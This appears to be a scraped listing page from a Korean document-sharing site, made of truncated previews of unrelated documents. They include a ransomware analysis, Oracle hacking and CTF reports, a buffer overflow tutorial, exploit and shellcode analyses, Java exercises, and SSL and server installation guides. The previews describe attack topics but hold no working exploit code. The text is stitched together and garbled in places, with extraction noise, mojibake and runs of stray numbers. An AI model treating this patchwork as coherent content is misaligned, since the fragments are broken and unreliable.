1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More informationronny report( wooyaggo, hkpco ).hwp
Padocon Capture The Flag Hacking Contest Report team_name: ronny 구성원 - wooyaggo, hkpco 1. SectionA Level1 http://www.plus.or.kr/ctf/prob/c4724593d21aeccd08a4914b66ba278e SectionA Level1 : http://www.plus.or.kr/ctf/prob/c4724593d21aeccd08a4914b66ba278e
More informationJAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각
JAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( http://java.sun.com/javase/6/docs/api ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각선의길이를계산하는메소드들을작성하라. 직사각형의가로와세로의길이는주어진다. 대각선의길이는 Math클래스의적절한메소드를이용하여구하라.
More information버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습
앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습니다. 여러분모두 Windows 에서 hex editor(hex dump, hex viewer) 라는것을사용해보셨을겁니다. 바로바이너리파일을 16 진수
More informationPowerPoint Template
JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것
More information[ 컴퓨터시스템 ] 3 주차 1 차시. 디렉토리사이의이동 3 주차 1 차시디렉토리사이의이동 학습목표 1. pwd 명령을사용하여현재디렉토리를확인할수있다. 2. cd 명령을사용하여다른디렉토리로이동할수있다. 3. ls 명령을사용하여디렉토리내의파일목록을옵션에따라다양하게확인할수
3 주차 1 차시디렉토리사이의이동 학습목표 1. pwd 명령을사용하여현재디렉토리를확인할수있다. 2. cd 명령을사용하여다른디렉토리로이동할수있다. 3. ls 명령을사용하여디렉토리내의파일목록을옵션에따라다양하게확인할수있다. 학습내용 1 : 현재디렉토리확인 1. 홈디렉토리 - 로그인을한후, 사용자가기본으로놓이게되는디렉토리위치를홈디렉토리 (home directory)
More information오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이
C Cover Story 05 Simple. Secure. Everywhere. 문서관리 혁신의 출발점, Oracle Documents Cloud Service 최근 문서 관리 시스템의 경우 커다란 비용 투자 없이 효율적으로 문서를 관리하기 위한 기업들의 요구는 지속적으로 증가하고 있다. 이를 위해, 기업 컨텐츠 관리 솔루션 부분을 선도하는 오라클은 문서관리
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More information목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정
W2K8 R2 RemoteApp 및 Web Access 설치 및 구성 Step-By-Step 가이드 Microsoft Korea 이 동 철 부장 2009. 10 페이지 1 / 60 목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host)
More informationMicrosoft PowerPoint - 07-EDU-Apache-9-1.ppt
1 아파치, HTTP, APM 소개 APM 설치하기 순천향대학교컴퓨터학부이상정 1 아파치, HTTP, APM 소개 순천향대학교컴퓨터학부이상정 2 소개 정식명칭 : Apache HTTP server 관련홈페이지 : www.apache.org GNU GPL 라이센스를통해무료로배포되는소프트웨어 현재 50% 이상의웹서버소프트웨어시장점유율 안정적으로동작 www.amazon.com이나
More informationPOC "Power of Community" 이민우 (lwmr)
POC2011 - "Power of Community" 이민우 (lwmr) pmskylove@gmail.com L_01 Q : 지성이는홈쇼핑을하다이상한페이지에접속하여악성코드에감염되었다! 악성스크립트에포함되어있는쉘코드가다운로드하는 URL 을찾아라! Twitter 의 2mart 라는힌트를보고 WireShark 의 File Export -> Objects -> HTTP
More informationWebtob( 멀티도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201
Webtob( 멀티도메인 ) SSL 인증서갱신설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 02-512-9375 멀티및와일드인증서의경우포트번호를동일하게설정이가능하다. (https 통신으로 443 으로통일가능 ) 1. 발급받으신인증서를해당 SSL 폴더에업로드또는저장합니다. [root@localhost New]$ cp star.ucert.co.kr* /webtob/ssl
More information기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.
PDMLink 에등록된 Office 문서들의 PDF 문서변환기능및 Viewer 기능을알아보자 PDM Link에서지원하는 [Product View Document Support] 기능은 Windows-Base 기반의 Microsoft Office 문서들을 PDMLink용 Viewer인 Product View를통한읽기가가능한 PDF Format 으로변환하는기능이다.
More information리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.
3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More informationbn2019_2
arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily
More information<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>
HUST 내부해킹대회 보고서 Uprising 팀원: 이규현, 김정주, 장민석, 송진기 Network.1 문제 파일을 UltraEdit으로 열어보니 ip가 적혀있고 통신내용인 것 같은 내용들이 포함되어있어 Wireshark로 열어보니 패킷들이 캡쳐되어있었다. Wireshark에서 Follow TCP Stream을 이용해 통신 내용을 보는데 일부가 인코드된 Base64
More informationhd1300_k_v1r2_Final_.PDF
Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice
More information±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾
141 2 13 2 13 2 13 9 19 142 2002 MD 143 6 6 6 144 2003 2 6 1) 1 2007 3 p 140 145 6 2) 2002 9 17 18 76 15 58 28 3) 2002 9 17 2 6 2007 4 16 3 2002 9 19 146 10 15 5 TV 5 5 4) 4 2003 p 44 147 2001 2000 2000
More information날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약
EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가다른취약점과비교하여유난히많았습니다. 세계적으로가장많이사용되고있는
More informationMicrosoft PowerPoint - 6.pptx
DB 암호화업데이트 2011. 3. 15 KIM SUNGJIN ( 주 ) 비에이솔루션즈 1 IBM iseries 암호화구현방안 목차 목 차 정부시책및방향 제정안특이사항 기술적보호조치기준고시 암호화구현방안 암호화적용구조 DB 암호화 Performance Test 결과 암호화적용구조제안 [ 하이브리드방식 ] 2 IBM iseries 암호화구현방안 정부시책및방향
More information<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>
웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)
More informationPoison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3
Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow
More informationDropbox Forensics
Cloud Storage Forensics Part I : Dropbox 2013. 09. 28 forensic.n0fate.com Dropbox Forensics Dropbox Forensics Dropbox 웹기반파일공유서비스 총 12 개의클라이언트지원 Desktop : Windows, Mac OS X, Linux Mobile : ios, Android,
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$
More informationMicrosoft PowerPoint - [Practice #1] APM InstalI.ppt
Practice #1 APM Install 2005. 8. 31 Lee Seung-Bok http://hpclab.uos.ac.kr Contents 2 APM 소개 Apache 설치 PHP 설치 MySQL 설치기타사항 Q & A APM(Apache,, PHP, MySQL) 소개 3 Apache PHP 현재전세계에서가장보편적으로사용되고있는오픈소스웹서버안정성및우수한기능
More informationMicrosoft Word - Static analysis of Shellcode.doc
Static analysis of Shellcode By By Maarten Van Horenbeeck 2008.09.03 2008.09.03 본문서에서는악성코드에서사용하는난독화되어있는쉘코드 를분석하는방법에대한 Maarten Van Horenbeeck 의글을번역 한것이다. Hacking Group OVERTIME OVERTIME force
More informationChapter 1
3 Oracle 설치 Objectives Download Oracle 11g Release 2 Install Oracle 11g Release 2 Download Oracle SQL Developer 4.0.3 Install Oracle SQL Developer 4.0.3 Create a database connection 2 Download Oracle 11g
More informationT100MD+
User s Manual 100% ) ( x b a a + 1 RX+ TX+ DTR GND TX+ RX+ DTR GND RX+ TX+ DTR GND DSR RX+ TX+ DTR GND DSR [ DCE TYPE ] [ DCE TYPE ] RS232 Format Baud 1 T100MD+
More informationÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù
21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More informationPowerPoint Presentation
FORENSIC INSIGHT; DIGITAL FORENSICS COMMUNITY IN KOREA SQL Server Forensic AhnLab A-FIRST Rea10ne unused6@gmail.com Choi Jinwon Contents 1. SQL Server Forensic 2. SQL Server Artifacts 3. Database Files
More informationStruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare Cen
Online Help StruxureWare Data Center Expert Version 7.2.4 StruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare
More informationHLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :
HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,
More informationMicrosoft Word - building the win32 shellcode 01.doc
Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode
More informationSena Device Server Serial/IP TM Version
Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com
More information0. 들어가기 전
컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청
More information세계 비지니스 정보
1.... 1 2. /2005... 3 3.... 6 4.... 8 5. /... 9 6....12 7. /...17 8....23 9. /...26 10....28 11....29 12....30 13. /...31 14....32 15....33 16. /...35 17....39 - i 18....43 19....46 20....51 21....53 22....56
More informationchapter1,2.doc
JavaServer Pages Version 08-alpha copyright2001 B l u e N o t e all rights reserved http://jspboolpaecom vesion08-alpha, UML (?) part1part2 Part1 part2 part1 JSP Chapter2 ( ) Part 1 chapter 1 JavaServer
More informationC 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12
More informationEDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P
EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두
More informationNetwork seminar.key
Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network
More informationUI TASK & KEY EVENT
2007. 2. 5 PLATFORM TEAM 정용학 차례 CONTAINER & WIDGET SPECIAL WIDGET 질의응답및토의 2 Container LCD에보여지는화면한개 1개이상의 Widget을가짐 3 Container 초기화과정 ui_init UMP_F_CONTAINERMGR_Initialize UMP_H_CONTAINERMGR_Initialize
More informationMango220 Android How to compile and Transfer image to Target
Mango220 Android How to compile and Transfer image to Target http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys
More informationCopyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat
Sun Server X3-2( Sun Fire X4170 M3) Oracle Solaris : E35482 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including
More informationMicrosoft PowerPoint - Smart CRM v4.0_TM 소개_20160320.pptx
(보험TM) 소개서 2015.12 대표전화 : 070 ) 7405 1700 팩스 : 02 ) 6012 1784 홈 페이지 : http://www.itfact.co.kr 목 차 01. Framework 02. Application 03. 회사 소개 01. Framework 1) Architecture Server Framework Client Framework
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationReport Designer V3.0 사용설명서 2장
타이니파머 사용자설명서 [2016-08-08] Mediaflow 김명수 설치설명서 내용 1. 개요... 5 2. 제품구성... 5 2.1. 하드웨어... 5 2.2. 소프트웨어... 8 2.3. 타이니파머허브 1.0... 8 3. 설치및설정... 9 3.1. Tinyfarmer Hub Daemon Application... 9 3.2. Tinyfarmer Hub
More informationTcl의 문법
월, 01/28/2008-20:50 admin 은 상당히 단순하고, 커맨드의 인자를 스페이스(공백)로 단락을 짓고 나열하는 정도입니다. command arg1 arg2 arg3... 한행에 여러개의 커맨드를 나열할때는, 세미콜론( ; )으로 구분을 짓습니다. command arg1 arg2 arg3... ; command arg1 arg2 arg3... 한행이
More informationMicrosoft PowerPoint 웹 연동 기술.pptx
웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More informationBook1
2015김제농업기계박람회 참가업체목록 참가업체 정보 1 대동공업(주) 김준식, 곽상철 02-3470-7331 대구광역시 달성군 논공읍 논공중앙로 34길 35 트랙터 2 동양물산기업(주) 김희용 063-830-2047 서울 강남구 논현동 90 대용빌딩 트랙터 3 국제종합기계(주) 남영준 043-730-1464 충북 옥천군 옥천읍 서부로 49번지 트랙터 4 엘에스엠트론(주)
More informationuntitled
FORCS Co., LTD 1 2 FORCS Co., LTD . Publishing Wizard Publishing Wizard Publishing Wizard Publishing Wizard FORCS Co., LTD 3 Publishing Wizard Publidhing Wizard HTML, ASP, JSP. Publishing Wizard [] []
More informationSubnet Address Internet Network G Network Network class B networ
Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,
More information*
Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46
More information